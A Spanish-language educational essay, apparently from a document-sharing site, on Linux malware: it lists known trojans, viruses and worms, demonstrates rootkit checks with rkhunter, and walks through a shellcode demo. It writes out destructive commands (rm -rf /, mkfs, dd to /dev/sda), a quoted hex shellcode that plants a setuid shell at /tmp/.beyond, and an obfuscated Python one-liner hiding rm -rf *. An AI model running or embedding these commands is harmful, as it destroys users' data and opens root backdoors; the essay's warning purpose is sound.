17
La cantidad de software malicioso disponible en GNU/Linux, incluyendo virus, troyanos y otro software escrito específicamente para GNU/Linux, se ha incrementado en los últimos años, duplicándose durante 2005 debido a la explosión del sistema operativo en entornos de usuario final e ingreso al mercado de las computadoras de escritorio. Hoy en día podemos encontrar estos archivos maliciosos o potencialmente dañinos en nuestro sistema: Troyanos: Kaiten – Linux.Backdoor.Kaiten trojan horse Rexob – Linux.Backdoor.Rexob trojan Virus: Alaeda – Virus.Linux.Alaeda Bad Bunny – Perl.Badbunny Binom – Linux/Binom Bliss Brundle Bukowski Diesel – Virus.Linux.Diesel.962

Archivos Potencialmente Maliciosos en Linux_gustavo_aguas_2

Embed Size (px)

DESCRIPTION

f

Citation preview

La cantidad de software malicioso disponible en GNU/Linux, incluyendo virus, troyanos y otro software escrito especficamente para GNU/Linux, se ha incrementado en los ltimos aos, duplicndose durante 2005 debido a la explosin del sistema operativo en entornos de usuario final e ingreso al mercado de las computadoras de escritorio.Hoy en da podemos encontrar estos archivos maliciosos o potencialmente dainos en nuestro sistema: Troyanos: Kaiten Linux.Backdoor.Kaiten trojan horse Rexob Linux.Backdoor.Rexob trojan Virus: Alaeda Virus.Linux.Alaeda Bad Bunny Perl.Badbunny Binom Linux/Binom Bliss Brundle Bukowski Diesel Virus.Linux.Diesel.962 Kagob a Virus.Linux.Kagob.a Kagob b Virus.Linux.Kagob.b MetaPHOR (also known as Simile) Nuxbee Virus.Linux.Nuxbee.1403 OSF.8759 Podloso Linux.Podloso (The iPod virus) Rike Virus.Linux.Rike.1627 RST Virus.Linux.RST.a Satyr Virus.Linux.Satyr.a Staog Vit Virus.Linux.Vit.4096 Winter Virus.Linux.Winter.341 Winux (also known as Lindose and PEElf ZipWorm Virus.Linux.ZipWorm

Gusanos: Adm Net-Worm.Linux.Adm Adore Cheese Net-Worm.Linux.Cheese Devnull Kork Linux/Lion (also known as Ramen) Mighty Net-Worm.Linux.Mighty Millen Linux.Millen.Worm Slapper SSH BruteforceEn la actualidad hay pocas descripciones disponibles de estos programas maliciosos, sin embargo tambin tenemos estos:Unrootkitpermite acceso a un ordenador ajeno oculto a los Administradores del sistema. Como su nombre indica, se puede definir como unconjunto de herramientaspara acceder a larazdel sistema. Aunque no es exactamente unmalware, ya que se instala despus de comprometer la mquina, el hecho de que esconda procesos ha hecho que se le asocie en este campo.Aunque la deteccin de unrootkites difcil por motivos comentados, existe una herramienta para entornosUNIXllamadarootkit hunter. La instalaremos desde la terminal:root@kali:~/Desktop# apt-get install rkhunter

Una vez instalado, iniciamos el programa para que compruebe el sistema:root@kali:~/Desktop# rkhunter --check

El proceso ir comprobando el sistema indicando el estado. Si en la configuracin del sistema aparece algn punto dbil que puede permitir un acceso, nos avisar. En mi caso, me avisa de tener el accesoroot por SSH, que podra comprometerme ante un ataque de fuerza bruta si la contrasea fuese dbil:

As pues, me dispongo adesactivarlo:root@kali:~/Desktop# nano /etc/ssh/sshd_config

Y desactivo el acceso:

Una simple shellcodeTodos conocemos a alguien que ve los virus de ordenador como lo peor del mundo. Luego hay otros que creen que formateando peridicamente los discos duros se salvan de todo mal o lo previenen mejor. Aqu se demostrar lo contrario:virus que no se detectany te pueden ayudar aformatear el ordenador.Entrando en la ShellcodeTal y como podemos deducir por su nombre, unaShellcodees un cdigo que nos va a devolver una ventana de comandos. Generalmente son cdigos cortos, ya que se tienen que introducir en la memria de la pila.Escribir unashellcodeen C. Esta es la ms bsica y la ms conocida:

A continuacin compilaremos el cdigo desde la terminal:root@kali:~/Desktop gcc shell.c -o give_me_shell

Antes de ejecutar, vamos a suponer que es unprograma en Cque nos ha mandado un compaero de clase bromista. Como no acabamos de fiarnos, lo analizamos con eledb-debugger:root@kali:~/Desktop edb --symbols give_me_shell

Observando la lnea delexecve, vemos que es una funcin que llama al sistemapara ejecutar un programa. Nos la jugamos y ejecutamos:root@kali:~/Desktop ./give_me_shell

Como se esperaba, el cdigo nos devuelve unaShellen la que somossuperusuarios. Hasta aqu todo bien pero Cmo formateo el ordenador? Ahora podemos usar todos los comandos debash. Escribimos un programa con una lista de comandos usandovi, el editor de texto ms engorroso que existe:# vi f_ck.shrm -rf /*

PulsaremosESCy a continuacin escribiremos: xpara salir guardando cambios. Quedar darle permisos de ejecucin y ejecutar:# chmod +x f_ck.sh# ./f_ck.sh

Tambin podemos encontrar comandos, usados correctamente se podran realizar actividades maliciosos.Antes de mostrar estos cdigos debo advertir que este ensayo es solo investigativo y por lo tanto decir que estos comandos podran dejar un sistema inservible.rm -rf /rm -rf .rm -rf *rm(borrar),-r(recursivo),f(forzar, sin confirmacin). Todo un clsico, borrar todo, el directorio actual o todos los ficheros visibles del directorio actual, si ejecutas el primero como root, hasta dnde llegar antes de petar?, creo que me quedar con la dudamkfsmkfs.ext3mkfs.cualquier_cosamkfs(crea un sistema de ficheros). Reformatea lo que viene despus del comando creando en su lugar un sistema de ficheros nuevo y limpio.cualquier_comando > /dev/sdadd if=algo of=/dev/sdaEsto escribe informacin en un dispositivo directamente ignorando el sistema de ficheros, que probablemente acabar corrompindose.Unabomba forkque satura la tabla de procesos del sistema,fcilmente evitable.Ficheros comprimidosque cuando se descomprimen te inundan el sistema de archivos, te dejan sin espacio en el disco, o te sobrescriben ficheros.Scriptso programas creados por gente malvada, hay que leer el cdigo fuente de cualquier cosa descargada de unafuente no fiableo cruzar los dedos y encomendarse a Dios mientras se ejecuta (la efectividad de este mtodo no est probada). Como ejemplo, el mensaje en una lista de correo que ofreca un programilla en C para aprovecharse deun exploit del comando sudo, veamos la parte interesante del mismo:char esp[] __attribute__ ((section(".text"))) /* e.s.prelease */= "xebx3ex5bx31xc0x50x54x5ax83xecx64x68""xffxffxffxffx68xdfxd0xdfxd9x68x8dx99""xdfx81x68x8dx92xdfxd2x54x5exf7x16xf7""x56x04xf7x56x08xf7x56x0cx83xc4x74x56""x8dx73x08x56x53x54x59xb0x0bxcdx80x31""xc0x40xebxf9xe8xbdxffxffxffx2fx62x69""x6ex2fx73x68x00x2dx63x00""cp -p /bin/sh /tmp/.beyond; chmod 4755/tmp/.beyond;"; Esto trozo de cdigo hexadecimal ejecuta unrm -rf ~ / &, borraremos nuestro home y si somos root todo el disco.Hay que tener cuidado en especial al tocar otros comandos como chmod,chownychgrpque alteran los permisos, propietario y grupo de los ficheros ya que podramos conceder acceso a cualquiera o dejar el sistema hecho un desastre si se aplican de forma recursiva sin control.Tambin recordar que todos estos comandos se pueden ejecutar mediante scripts en lenguajes comopython, por ejemplo este cdigo:python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'Ejecuta unrm -rf *oculto tras el sn!.sg!+.Despus de esta investigacin, ahora sabemos que Linux no es un sistema 100% seguro y que su consola tiene un gran poder a la hora de ejecutar comandos malintencionados que una vez caen en manos de personas malintencionadas trae un riesgo para todos los usuarios.

GLOSARIO: 1. SCAREWARE abarca varias clases de software para estafar con cargas maliciosas2. SPYWARE programa espa es un software que recopila informacin de un ordenador y despus transmite esta informacin a una entidad externa3. CRIMEWARE es una clase de software malicioso diseado especficamente para automatizar el delito ciberntico.

WEBGRAFIA:www.wikipedia.comwww.taringa.nethttp://sinconexion.net/linux